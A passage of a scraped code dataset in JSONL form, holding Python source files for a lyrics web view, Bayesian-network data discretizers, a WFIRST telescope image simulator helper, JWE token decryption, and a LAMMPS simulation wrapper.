self.kwargs['artist_slug'].replace('-', ' ')\n song_title = self.kwargs['song_slug'].replace('-', ' ')\n\n # Prep the artist name in romaji and the song title for display\n if self.kwargs['artist_slug'] in SLUG_TO_ARTIST:\n context['artist'] = SLUG_TO_ARTIST[self.kwargs['artist_slug']]\n else:\n context['artist'] = artist_name.title()\n\n if self.kwargs['song_slug'] in SLUG_TO_SONG_TITLE:\n context['song_title'] = SLUG_TO_SONG_TITLE[self.kwargs['song_slug']]\n else:\n context['song_title'] = song_title.title()\n\n print(context['artist'])\n print(context['song_title'])\n\n lyrics_query = Song.objects.filter(title_romaji__iexact=context['song_title']).filter(artist__name_romaji__iexact=context['artist'])\n lyrics = lyrics_query[0]\n\n context['lyrics'] = lyrics\n context['artist_slug'] = self.kwargs['artist_slug']\n\n return context\n\n","sub_path":"mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"400148568","text":"# Contributors: Siddharth Jain, Aayush Makharia, Vineet Malik, Sourav Suman, Ayush Chauhan, Gaurav Sinha\n# Owned by: Adobe Corporation\nimport pandas as pd\nfrom feature_engine import discretisers as dsc\nfrom sklearn.preprocessing import KBinsDiscretizer\nimport sys\n# sys.path.append('./libraries/')\nfrom libraries.caim_test import CAIMD\nimport numpy as np\nfrom python.ci_tests import fast_conditional_ind_test as FCIT\nfrom multiprocessing import Pool\nfrom python.bnutils import one_hot_encoder\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Implements multiple discretization techniques for continuous variables\n\n\nclass Decision_Tree_Discretizer:\n\n \"\"\"Discretizes a continuous variable using Decision tree classifier\n Args:\n score: score to be considered for discretization\n **kwargs: dictionary of parameters for DecisionTreeDiscretiser\n\n kwargs format with default values: {'cv': 10, 'regression': False, 'max_depth': [1,2,3], 'max_samples_leaf': [10, 4]}\n \"\"\"\n def __init__(self, score='accuracy', **kwargs):\n self.cv = kwargs.get('cv', 10)\n self.scoring = score\n self.regression = kwargs.get('regression', False),\n self.param_grid = {\n 'max_depth': kwargs.get('max_depth', [1, 2, 3]),\n 'min_samples_leaf': kwargs.get('max_samples_leaf', [10, 4])\n }\n\n def fit(self, data, node, target, **kwargs):\n self.node = node\n self.disc = dsc.DecisionTreeDiscretiser(cv=self.cv, scoring=self.scoring, variables=[node], regression=False, param_grid=self.param_grid)\n self.disc.fit(data[[node, target]], data[target])\n print(self.disc.scores_dict_[node])\n return self, self.disc.scores_dict_[node]\n\n def transform(self, data):\n print(data)\n return self.disc.transform(data[[data.columns[0], data.columns[1]]])[self.node]\n\n\ndef unsupervised_discretization(df, node_list, bins, discretization_type):\n \"\"\"Bins continuous data into intervals.\n Args:\n df : pandas dataframe object wtih mixed data\n node_list : list of continuous nodes\n bins : number of intervals with equal width\n discretization_type : takes one of the following values -\n uniform : generates bins of equal width\n frequency : generates bins of equal frequency\n K-means : generates bins using kmeans algorithm\n Returns:\n dataframe with discretized columns appended in df\n \"\"\"\n discretizer = None\n if discretization_type == 'uniform':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='uniform')\n elif discretization_type == 'quantile':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='quantile')\n elif discretization_type == 'kmeans':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='kmeans')\n else:\n raise NotImplementedError(\"Invalid discretization type\")\n df[node_list] = discretizer.fit_transform(df[node_list])\n return df\n\n\ndef get_laim(sp, scheme, xi, y):\n \"\"\" LAIM score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n LAIM score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n M = 0\n laim = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n if val[0] == -1e10:\n val = val[1:]\n counts = counts[1:]\n\n Mr = counts.sum()\n maxr = counts.max()\n laim += (maxr / Mr) * maxr\n M += Mr\n\n laim /= n * M\n return laim\n\n\ndef get_ameva(sp, scheme, xi, y):\n \"\"\" Ameva score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n Ameva score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n label, label_counts = np.unique(y, return_counts=True)\n M_label = dict()\n for j in range(len(label)):\n M_label[label[j]] = label_counts[j]\n\n M = 0\n ameva = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n\n Mr = counts.sum()\n for j in range(len(val)):\n ameva += (counts[j] / Mr) * (counts[j] / M_label[val[j]])\n M += Mr\n\n ameva = (M * (ameva - 1)) / (n * (len(label) - 1))\n return ameva\n\n\ndef get_mlameva(sp, scheme, xi, y):\n \"\"\" Multi Label Ameva score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n MLAmeva score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n label, label_counts = np.unique(y, return_counts=True)\n if label[0] == -1e10:\n label = label[1:]\n label_counts = label_counts[1:]\n M_label = dict()\n for j in range(len(label)):\n M_label[label[j]] = label_counts[j]\n\n M = 0\n mlameva = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n if val[0] == -1e10:\n val = val[1:]\n counts = counts[1:]\n\n Mr = counts.sum()\n for j in range(len(val)):\n mlameva += (counts[j] / Mr) * (counts[j] / M_label[val[j]])\n M += Mr\n\n mlameva = (M * (mlameva - 1)) / (n * (len(label) - 1))\n return mlameva\n\ndef parallel(args):\n if FCIT(args[0], args[3], args[4], args[5], nodes=args[1], onehot_dict=args[2]) > args[6]:\n return args[4]\n return -1\n\nclass Data_Driven_Discretizer:\n \"\"\" Used to discretize a set of variables using the inter-dependence information available before hand.\n Args:\n data : data to be discretized\n skel : the inter-dependence knowledge available before-hand\n nodes : a dict containing extra information about the variables\n max_process : max no of processes to create during parallelization\n method : core discretization technique to be used\n Returns:\n discretized data\n \"\"\"\n def __init__(self, data, skel, cond_check_skel, nodes, alpha=0.1, max_process=10, discretizer=CAIMD, method=get_mlameva):\n self.data = data\n self.alpha = alpha\n self.max_process = max_process\n self.skel = skel\n self.cond_check_skel = cond_check_skel\n self.nodes = nodes\n self.disc_data = data.copy()\n self.cont_list = [node[0] for node in self.nodes if node[1]['type'] == 'cont']\n self.disc_list = [node[0] for node in self.nodes if node[1]['type'] == 'disc']\n self.n_samples = self.data.shape[0]\n self.onehot_dict = {node[0]: one_hot_encoder(data[:][node[0]].to_numpy()) for node in self.nodes if node[1]['type'] == 'disc'}\n self.discretizer = discretizer(score=method, max_process=max_process)\n\n \n def cond_check(self, node, neigh, neighbors, scheme):\n \"\"\"Returns the no of nodes that have either changed to independent or dependent on \"node\" due to discretization\"\"\"\n pool = Pool(self.max_process)\n PCS = set(self.cont_list + self.disc_list)-set([node])\n data_disc = self.data.copy()\n\n data_disc[node] = scheme.transform(self.data[[node, neigh]])\n data_disc = data_disc.replace({node: pd.unique(data_disc[node])}, {node: list(range(pd.unique(data_disc[node]).shape[0]))})\n self.onehot_dict[node] = one_hot_encoder(data_disc[node].to_numpy())\n\n args = [(self.data,self.nodes,self.onehot_dict,node, neigh, [],self.alpha) for neigh in PCS]\n PCS = PCS - set(pool.map(parallel, args))\n args = [(self.data,self.nodes,self.onehot_dict,node, X, [Z],self.alpha) for X in PCS for Z in PCS-set([X])]\n new_neighbors = PCS-set(pool.map(parallel, args))\n\n pool.close()\n pool.join()\n\n return len(new_neighbors - set(neighbors)) + len(set(neighbors) - new_neighbors)\n\n def discretize(self):\n \"\"\"Entry point into the algorithm\"\"\"\n cont_queue = []\n for node in self.cont_list:\n if len(list(self.skel.neighbors(node))) != 0:\n ratio = len(set(self.skel.neighbors(node))-set(self.cont_list))/len(list(self.skel.neighbors(node)))\n else:\n ratio = 0\n cont_queue.append((ratio, len(list(self.skel.neighbors(node))), node))\n cont_queue = sorted(cont_queue, key=lambda x: (-x[0], -x[1]))\n\n while cont_queue:\n (ratio, _, node) = cont_queue.pop(0)\n best_score = -1\n best_scheme = None\n main_list = []\n if ratio == 0:\n iter_set = set(self.disc_list)\n else:\n iter_set = set(self.skel.neighbors(node))-set(self.cont_list)\n for neigh in iter_set:\n scheme, score = self.discretizer.fit(self.data[[node, neigh]], node, neigh)\n main_list.append((self.cond_check(node, neigh, list(self.cond_check_skel[node]), scheme), score, scheme, neigh))\n (best_shd, best_score, best_scheme, best_neigh) = sorted(main_list, key=lambda i: (i[0], -i[1]))[0]\n\n self.data[node] = best_scheme.transform(self.data[[node, best_neigh]])\n self.data = self.data.replace({node: pd.unique(self.data[node])}, {node: list(range(pd.unique(self.data[node]).shape[0]))})\n self.cont_list.remove(node)\n self.disc_list.append(node)\n for i in range(len(cont_queue)):\n if cont_queue[i][2] in set(self.skel.neighbors(node)):\n cont_queue[i] = (cont_queue[i][0]+1/len(list(self.skel.neighbors(cont_queue[i][2]))), cont_queue[i][1], cont_queue[i][2])\n cont_queue = sorted(cont_queue, key=lambda x: (-x[0], -x[1]))\n\n return self.data\n\n\ndef PCA_discretizer(data, skel, PCS_neigh, nodes, alpha, max_process, threshold = 90):\n cont_nodes = [node[0] for node in nodes if node[1]['type'] == 'cont']\n data_cont = data.loc[:, cont_nodes].values\n data_transformed = StandardScaler().fit_transform(data_cont)","sub_path":"LIB/build/lib/python/discretize.py","file_name":"discretize.py","file_ext":"py","file_size_in_byte":10547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124744280","text":"#! /usr/bin/env python\n'''\nWFIRST Infrared Nearby Galaxies Test Image Product Simulator\nProduces input files for the WFIRST STIPS simulator\n'''\nimport time\nimport numpy as np\nfrom astropy import wcs\nfrom astropy.io import fits, ascii\nfrom astropy.table import Table\n\nclass WingTips:\n '''\n Initialize WingTips object\n '''\n def __init__(self,infile=[],center=[0,0]):\n if len(infile)==0:\n self.tab = np.array([])\n else:\n if isinstance(infile,str):\n infile = [infile]\n self.tab = WingTips.read_stips(infile[0])\n if len(infile)>1:\n for i in range(1,len(infile)):\n _tab = WingTips.read_stips(infile[i])\n self.tab = np.vstack((self.tab,_tab))\n center = WingTips.get_center(self.tab[:,0],self.tab[:,1])\n self.center = center\n self.n = self.tab.shape[0]\n self.infile = infile\n return None\n\n\n ''' Strip coordinates from WingTips object '''\n def strip_radec(self,hasID=False):\n _i = int(hasID)\n self.tab = np.delete(self.tab,[_i,_i+1],1)\n return None\n\n \n ''' Attach given RA-DEC to WingTips object'''\n def attach_radec(self,radec,hasID=False):\n if self.n != radec.shape[0]:\n raise ValueError('Number of RA-DEC does not match sources')\n _i = int(hasID)\n self.tab = np.insert(self.tab,_i,radec.T,1)\n self.center = WingTips.get_center(radec[:,0+_i],radec[:,1+_i])\n return None\n\n \n ''' Replace RA-DEC of WingTips object '''\n def replace_radec(self,radec,hasID=False):\n self.strip_radec(hasID)\n self.attach_radec(radec,hasID)\n return None\n\n \n ''' \n Return random RA-DEC for given image or WingTips object\n Optionally, specify center and image size desired\n '''\n def random_radec_for(self,other,shape=(4096,4096),sample=False,n=0,hasID=False):\n _i = int(hasID)\n try:\n if other.endswith('.fits'):\n return WingTips.random_radec(self.n,imfile=other)\n except AttributeError:\n if not sample:\n return WingTips.random_radec(self.n,center=other.center)\n elif not bool(n):\n return WingTips.sample_radec(n=self.n,radec1=False,radec2=other.tab[:,_i:_i+1])\n else:\n return WingTips.sample_radec(n=n,radec1=self.tab[:,_i:_i+1],radec2=other.tab[:,_i:_i+1])\n\n\n ''' Merge two WingTips objects '''\n def merge_with(self,other,hasRADEC=True,hasID=False):\n if self.tab.shape[1]!=other.tab.shape[1]:\n raise ValueError('Number of columns does not match',self.tab.shape[1],other.tab.shape[1])\n self.tab = np.vstack((self.tab,other.tab))\n self.n = self.tab.shape[0]\n self.infile.append(other.infile)\n _i = int(hasID)\n if hasRADEC:\n self.center = WingTips.get_center(self.tab[:,0+_i],self.tab[:,1+_i])\n return None\n\n \n ''' Convert flux to surface brightness for sersic profile galaxies '''\n def flux_to_Sb(self,hasRADEC=True,hasID=False):\n _i = int(hasID)\n if hasRADEC:\n _i = _i+2\n _f = self.tab[:,_i].astype(float)\n _r = self.tab[:,_i+3].astype(float)\n _a = self.tab[:,_i+5].astype(float)\n _s = (0.5*_f) / (np.pi * _r**2 * _a) \n self.tab = np.delete(self.tab,_i,1)\n self.tab = np.insert(self.tab,_i,_s.T,1)\n return None\n\n\n ''' Write out a STIPS input file '''\n def write_stips(self,outfile='temp.txt',hasID=False,hasCmnt=False,saveID=False,ipac=False):\n _tab = WingTips.get_tabular(self.tab,hasID,hasCmnt,saveID)\n _nms = ('id', 'ra', 'dec', 'flux', 'type', 'n', 're', 'phi', 'ratio', 'notes')\n _fmt = ('%10d','%15.7f','%15.7f','%15.7f','%8s','%10.3f','%15.7f','%15.7f','%15.7f','%8s')\n _t = Table(_tab, names=_nms)\n if ipac:\n ascii.write(_t, outfile, format='ipac', formats=dict(zip(_nms,_fmt)))\n else:\n ascii.write(_t, outfile, format='fixed_width', delimiter='', formats=dict(zip(_nms,_fmt)))\n return print('Wrote out %s \\n' % outfile)\n\n \n \n ''' Build a WingTips class object from scratch '''\n @staticmethod\n def from_scratch(flux, ra=[], dec=[], center=[], ID=[], Type=[], n=[], re=[], phi=[], ratio=[], notes=[], outfile=''):\n _temp = WingTips()\n _temp.n = len(flux)\n _temp.infile = ['fromScratch']\n\n if len(center)>0:\n _temp.center = center\n if len(ra)==0:\n radec = _temp.random_radec_for(_temp)\n ra,dec = radec[:,0],radec[:,1]\n elif ((len(ra)==len(dec))&(len(ra)>0)):\n _temp.center = WingTips.get_center(np.array(ra),np.array(dec))\n else:\n raise ValueError('Provide valid coordinate or center')\n\n if ((len(Type)==0)|(Type is 'point')|(Type is 'sersic')):\n if ((len(Type)==0)|(Type is 'point')):\n Type = np.repeat(np.array(['point']),len(flux))\n _ones = np.ones_like(flux)\n n, re, phi, ratio = _ones, _ones, _ones, _ones\n elif (Type=='sersic'):\n Type = np.repeat(np.array(['sersic']),len(flux))\n elif (len(Type)==len(flux)):\n Type = np.array(Type)\n\n _tab = np.array([ra,dec,flux,Type,n,re,phi,ratio]).T\n\n if (len(ID)==len(flux)):\n _tab=np.hstack((np.array(ID,ndmin=2).T,_tab))\n if (len(notes)==len(flux)):\n _tab=np.hstack((_tab,np.array(notes,ndmin=2).T))\n\n _temp.tab = np.array(_tab)\n\n\n if outfile is '':\n return _temp\n else:\n _temp.write_stips(outfile,hasID=bool(ID),hasCmnt=bool(notes),saveID=bool(ID))\n return None\n\n \n ''' \n Read in a STIPS input file in ascii format and \n return corrsponding NumPy array\n '''\n @staticmethod\n def read_stips(infile,getRADEC=True,getID=False,getCmnt=False):\n _tab = []\n _infile = ascii.read(infile)\n print('\\nRead in %s \\n' % infile)\n\n if getID:\n _tab.append(_infile['id'])\n if getRADEC:\n _tab.append(_infile['ra'])\n _tab.append(_infile['dec'])\n\n _tab.append(_infile['flux'])\n _tab.append(_infile['type'])\n _tab.append(_infile['n'])\n _tab.append(_infile['re'])\n _tab.append(_infile['phi'])\n _tab.append(_infile['ratio'])\n\n if getCmnt:\n _tab.append(_infile['comment'])\n\n return np.array(_tab).T\n\n\n ''' Return tabular lists for STIPS input file columns '''\n @staticmethod\n def get_tabular(_tab,hasID=False,hasCmnt=False,saveID=False):\n _i = int(hasID)\n if ~saveID:\n _n = _tab.shape[0]\n _ID = np.array(np.linspace(1,_n,_n),ndmin=2).T\n _tab = np.hstack((_ID,_tab[:,_i:]))\n if ~hasCmnt:\n _cmnt = np.array(np.repeat(np.array(['comment']),_tab.shape[0],),ndmin=2).T\n _tab = np.hstack((_tab,_cmnt))\n return [_tab[:,0].astype(float), _tab[:,1].astype(float), _tab[:,2].astype(float), \\\n _tab[:,3].astype(float), _tab[:,4], _tab[:,5].astype(float), \\\n _tab[:,6].astype(float), _tab[:,7].astype(float), \\\n _tab[:,8].astype(float), _tab[:,9]]\n\n\n ''' Build WCS coordinate system from scratch '''\n @staticmethod\n def create_wcs(centers=[0,0],crpix=[2048,2048],cdelt=[-0.11/3600,0.11/3600],cunit=['deg','deg'],\\\n ctype=['RA---TAN','DEC--TAN'],lonpole=180,latpole=24.333335,\\\n equinox=2000.0,radesys='ICRS'):\n _w = wcs.WCS()\n _w.wcs.cdelt = cdelt\n _w.wcs.crpix = crpix\n _w.wcs.crval = centers\n _w.wcs.cunit = cunit\n _w.wcs.ctype = ctype\n _w.wcs.lonpole = lonpole\n _w.wcs.latpole = latpole\n _w.wcs.radesys = radesys\n _w.wcs.equinox = equinox\n return _w\n\n\n ''' Return coordinate system for given image file'''\n @staticmethod\n def read_wcs(imfile):\n print('Getting coordinates from %s \\n' % imfile)\n return wcs.WCS(fits.open(imfile)[1].header)\n\n\n ''' Return 'n' random radec for given image file or coordinate list '''\n @staticmethod\n def random_radec(n=10,center=[0,0],shape=(4096,4096),imfile=''):\n _xy = np.random.rand(n,2)*shape\n if imfile is not '':\n _w = WingTips.read_wcs(imfile)\n else:\n _w = WingTips.create_wcs(center)\n return _w.wcs_pix2world(_xy,1)\n\n \n '''\n Return a random sample of 'n' RA-DEC coordinates from 'radec2'\n If radec1 is specified, then replace 'n' radom coordinates\n in 'radec1' with random sample from 'radec2'\n '''\n @staticmethod\n def sample_radec(n=10,radec1=False,radec2=[]):\n in2 = np.random.randint(0,radec2.shape[0],n)\n if ~radec1:\n return radec2[in2,:]\n else:\n in1 = np.random.randint(0,radec1.shape[0],n)\n radec1[in1,:] = radec2[in2,:]\n return radec1\n \n\n ''' Return mean of RA-DEC positions given '''\n @staticmethod\n def get_center(ra,dec):\n return [ra.astype(float).mean(),dec.astype(float).mean()]\n\n \n '''\n Convert mags to WFI instrument counts\n Default is apparent AB mags\n Specify 'dist' if absolute mags\n Specify AB_Vega if Vega mags\n '''\n @staticmethod\n def get_counts(mag,ZP,dist=0,AB_Vega=0):\n if bool(dist):\n print('\\nDistance is d = %4.2f Mpc\\n' % dist)\n u = 25+5*np.log10(dist)\n mag = mag+u\n if bool(AB_Vega):\n mag = mag + AB_Vega\n return 10**((mag-ZP)/(-2.5))\n","sub_path":"wingtips.py","file_name":"wingtips.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"70351810","text":"import base64\n\nfrom cryptography.hazmat.backends.openssl.backend import backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher\nfrom cryptography.hazmat.primitives.ciphers import algorithms\nfrom cryptography.hazmat.primitives.ciphers import modes\n\nfrom app.utilities import strings\n\n\nclass JWEDecryptor(object):\n\n @staticmethod\n def _decrypt_cipher_text(cipher_text, iv, key, tag, jwe_protected_header):\n cipher = Cipher(algorithms.AES(key), modes.GCM(iv, tag), backend=backend)\n decryptor = cipher.decryptor()\n decryptor.authenticate_additional_data(jwe_protected_header.encode())\n decrypted_token = decryptor.update(cipher_text) + decryptor.finalize()\n return decrypted_token\n\n @staticmethod\n def _base64_decode(text):\n # if the text is not a multiple of 4 pad with trailing =\n # some base64 libraries don't pad data but Python is strict\n # and will throw a incorrect padding error if we don't do this\n if len(text) % 4 != 0:\n while len(text) % 4 != 0:\n text += \"=\"\n return base64.urlsafe_b64decode(text)\n\n\nclass JWERSAOAEPDecryptor(JWEDecryptor):\n\n def __init__(self, private_key, password):\n\n self.private_key = serialization.load_pem_private_key(\n private_key.encode(),\n password=password.encode(),\n backend=backend,\n )\n\n def decrypt(self, token):\n tokens = token.split('.')\n if len(tokens) != 5:\n raise ValueError(\"Incorrect size\")\n jwe_protected_header = tokens[0]\n encrypted_key = tokens[1]\n encoded_iv = tokens[2]\n encoded_cipher_text = tokens[3]\n encoded_tag = tokens[4]\n\n decrypted_key = self._decrypt_key(encrypted_key)\n iv = self._base64_decode(encoded_iv)\n tag = self._base64_decode(encoded_tag)\n cipher_text = self._base64_decode(encoded_cipher_text)\n\n signed_token = self._decrypt_cipher_text(cipher_text, iv, decrypted_key, tag, jwe_protected_header)\n return signed_token\n\n def _decrypt_key(self, encrypted_key):\n decoded_key = self._base64_decode(encrypted_key)\n key = self.private_key.decrypt(decoded_key, padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None))\n return key\n\n\nclass JWEDirDecrypter(JWEDecryptor):\n\n def decrypt(self, token, cek):\n tokens = token.split('.')\n if len(tokens) != 5:\n raise ValueError(\"Incorrect size\")\n jwe_protected_header = tokens[0]\n # encrypted_key is not used, would be tokens[1]\n encoded_iv = tokens[2]\n encoded_cipher_text = tokens[3]\n encoded_tag = tokens[4]\n\n iv = self._base64_decode(encoded_iv)\n tag = self._base64_decode(encoded_tag)\n cipher_text = self._base64_decode(encoded_cipher_text)\n\n decrypted_text = self._decrypt_cipher_text(cipher_text, iv, cek, tag, jwe_protected_header)\n decoded_text = self._base64_decode(strings.to_str(decrypted_text))\n return strings.to_str(decoded_text)\n","sub_path":"app/cryptography/jwe_decryption.py","file_name":"jwe_decryption.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"258059248","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 10 12:28:16 2019\n\nCode is split into the main class (Lammps) and examples.\n\n@author: Pat Taylor (pt409)\n\"\"\"\n\nimport subprocess as sp\nimport os\nimport sys\nimport numpy as np\nfrom random import sample\nfrom mendeleev import element\n\n################################# CLASS #######################################\n\nclass Lammps :\n \n # classmethod to redefine these is supplied later\n lammps_cmd = \"mpirun lmp_mpi\"\n \n def __init__(self,input_file=\"\",data_file=None) :\n self.input_file = input_file\n self.data_file = data_file\n self.log_file = input_file.replace(\".in\",\".log\")\n # When writing new functions be very careful about whether this should be prepended to the .in file, .log file, etc\n self.work_dir = \".\"\n self.ready = False # Flag if class object has been correctly setup to run a lammps simulation\n self.error_msg = [] # Track error messages for this instance\n \n def print_error(self): print(\"No errors.\\n\") if self.error_msg == [] else print(\"\\n\".join([\"Errors:\"]+self.error_msg))\n\n def input_loc(self): return self.work_dir+\"/\"+self.input_file\n def data_loc(self): return self.work_dir+\"/\"+self.data_file\n def log_loc(self): return self.work_dir+\"/\"+self.log_file \n \n # Run function for lammps\n def run(self,total_attempts=3,echo_msg=False):\n if self.ready:\n # have a few goes at running lammps in case it has some unknown random failure\n run_attempts = 0\n while run_attempts <= total_attempts :\n # give a message saying which simulation is about to start\n if echo_msg : sp.call(['echo','Starting simulation for lammps file '+self.input_file]) \n # run lammps\n full_lammps_cmd = \" \".join([self.lammps_cmd,\"-log\",self.log_file,\"-in\",self.input_file,\"> /dev/null\"])\n run = sp.Popen(full_lammps_cmd, shell=True, executable='/bin/bash',cwd=self.work_dir,stdout=sp.PIPE,stderr=sp.PIPE)\n run.wait()\n stdout, stderr = run.communicate()\n # check lammps return code\n if run.returncode == 0 :\n # Assign an output to object\n break\n # returncode 1 means lammps failed in a controlled manner\n elif run.returncode == 1 :\n self.error_msg += [\"Lammps encountered a known error for input file \"+self.input_file]\n self.error_msg += [stdout.decode('ascii')]\n sp.call(['echo',\"\\n\".join(self.error_msg)]) \n break\n # other returncode means sim failed for some other reason\n else :\n self.error_msg += [\"Lammps encountered an unknown error for input file \"+self.input_file]\n run_attempts += 1\n else:\n self.error_msg += [\"Not ready to run lammps for this instance (probably no .in or .data file supplied).\"] \n \n # use this to setup lammps instance before running it\n @classmethod\n def setup(cls,input_file,data_file=None):\n if os.path.isfile(input_file) and (not data_file or os.path.isfile(data_file)):\n if not data_file:\n new_object = cls(input_file.split(\"/\")[-1],data_file)\n else:\n new_object = cls(input_file.split(\"/\")[-1],data_file.split(\"/\")[-1])\n new_object.work_dir = \".\"+\"/\".join(input_file.split(\"/\")[:-1])\n new_object.ready = True\n return new_object\n else :\n new_err_msg = \"Lammps .in file or .data file not found. Returning an empty class object.\\n\"\n new_object = cls()\n new_object.error_msg += [new_err_msg]\n return new_object\n \n @classmethod\n def default_setup(cls,script,loc=\".\",pot=\"NiAlCoCrMoTiWTa.set\"):\n script_lib = {\"sfe_setup\":\"/sfe_scripts/sfe_1.in\",\n \"sfe_min\":\"/sfe_scripts/sfe_2.in\",\n \"sfe_step\":\"/sfe_scripts/sfe_3_restart.in\",\n \"apbe_setup\":\"/sfe_scripts/apbe_1.in\",\n \"apbe_min\":\"/sfe_scripts/apbe_2.in\",\n \"apbe_step\":\"/sfe_scripts/apbe_3_restart.in\",\n \"md_setup\":\"/md_scripts/md_1.in\",\n \"md_run\":\"/md_scripts/md_2.in\",\n \"elastic_setup\":\"/elastic_scripts/elastic_1.in\",\n \"elastic_run\":\"/elastic_scripts/elastic_2.in\",\n \"elastic_deform\":\"/elastic_scripts/elastic_3.in\"}\n try:\n desired_file = sys.path[2]+\"/lammps_scripts\"+script_lib[script] if sys.path[2] != \"\" else \"lammps_scripts\"+script_lib[script]\n new_input_file = loc + \"/\" + script_lib[script].split(\"/\")[-1] if loc != \".\" else script_lib[script].split(\"/\")[-1]\n sp.call([\"mkdir\",\"-p\",loc])\n prefix = (loc.count(\"/\")+1*(loc!=\".\"))*\"../\" # Prefix for potentials location\n with open(desired_file,'r') as default_file:\n default_content = default_file.read()\n updated_content = default_content.replace(pot,sys.path[2]+\"/potentials/\"+pot) if sys.path[2] != \"\" else default_content.replace(pot,prefix+\"potentials/\"+pot)\n with open(new_input_file,\"w+\") as write_file:\n write_file.write(updated_content)\n new_object = cls.setup(new_input_file)\n new_object.work_dir = loc\n return new_object\n except KeyError: \n new_object = cls()\n new_object.error_msg += [\"Script name supplied does not exist\"]\n return new_object\n \n # can initialise using a currently existing instance\n @classmethod\n def based_on_setup(cls,old_instance,new_name,update_dict={},new_data_file=None,new_dir=False):\n # Check if old_instance is actually an instance of the class\n if isinstance(old_instance,Lammps):\n # Create new directory for this one\n old_work_dir = old_instance.work_dir\n new_work_dir = old_work_dir if not new_dir else old_work_dir+\"/\"+new_name\n sp.call([\"mkdir\",\"-p\",new_work_dir])\n # Check input file for references to \"old\" .data or potentials files\n # Also check for dict elements\n # This code is a bit messy to deal with possibility of 2+ word key\n new_lines = []\n with open(old_instance.input_loc(),'r') as old_file:\n lines = old_file.readlines()\n for line in lines:\n words = line.split()\n for j,_ in enumerate(words) :\n key = \" \".join(words[:j+1])\n # check for user specified update keywords\n if key in update_dict:\n words = [key]+update_dict[key].split()\n # check for potential files or .data files\n if key in (\"pair_coeff\",\"read_data\"):\n for i, word in enumerate(words):\n if os.path.isfile(new_work_dir+'/'+(new_work_dir.count('/')-old_work_dir.count('/'))*'../'+word):\n words[i] = (new_work_dir.count('/')-old_work_dir.count('/'))*'../'+word\n if key in update_dict or key in (\"pair_coeff\",\"read_data\"):\n break # Make sure a found keyword in the file isn't double counted whilst searching the whole line\n new_lines += [\" \".join(words)+\"\\n\"]\n # Write new input file\n new_input_file = new_work_dir+\"/\"+new_name\n with open(new_input_file,\"w+\") as new_file:\n new_file.writelines(new_lines)\n # Initialise new class instance\n if not new_data_file: \n new_mvd_data_file = old_instance.data_file\n else:\n new_mvd_data_file = new_data_file.split(\"/\")[-1]\n sp.call([\"cp\",new_data_file,new_work_dir+\"/\"+new_mvd_data_file])\n new_instance = cls(input_file=new_name,data_file=new_mvd_data_file)\n new_instance.work_dir = new_work_dir\n new_instance.ready = True\n return new_instance \n \n # use this to setup the command that will be used to run lammps\n # NB this will alter the command for ALL instances of the class that exist or will be created\n @classmethod\n def command(cls,cores,lammps_path = \"lmp_mpi\") :\n cls.lammps_cmd = \"mpirun -n \"+str(cores)+\" \"+lammps_path\n \n # Use this to update the .in file of a given object\n def update(self,update_dict,replace_dict={},new_input_name=None):\n # Check input file for references to \"old\" .data or potentials files\n # Also check for dict elements\n # This code is a bit messy to deal with possibility of 2+ word key\n new_lines = []\n with open(self.input_loc(),'r') as old_file:\n lines = old_file.readlines()\n for line in lines:\n # Check for simple replacements\n for replace_key in replace_dict:\n line = line.replace(replace_key,replace_dict[replace_key])\n # Check for updates to lammps keywords\n words = line.split()\n for j,_ in enumerate(words) :\n key = \" \".join(words[:j+1])\n # check for user specified update keywords\n if key in update_dict:\n words = [key]+update_dict[key].split()\n break # Make sure a found keyword in the file isn't double counted whilst searching the whole line\n new_lines += [\" \".join(words)+\"\\n\"]\n # Write new input file\n if new_input_name:\n self.input_file = new_input_name\n with open(self.input_loc(),\"w+\") as new_file:\n new_file.writelines(new_lines)\n \n def read_log(self,thermo_style,np_out=True,incl_step=True):\n # thermo_style is the list of strings which appear before the quantities to extract\n # specify np_out=False to get a non numpy array output\n with open(self.log_loc(),'r') as infile:\n f = infile.readlines()\n \n out_list = [[] for _ in thermo_style]\n if incl_step: out_list += [[]]\n for l in f:\n l = l.split()\n if incl_step:\n if 'Step' in l:\n out_list[0] += [float(l[l.index('Step')+1])]\n for i,word in enumerate(thermo_style):\n if incl_step: i += 1\n if word in l:\n out_list[i] += [float(l[l.index(word)+2])]\n \n if np_out : \n return 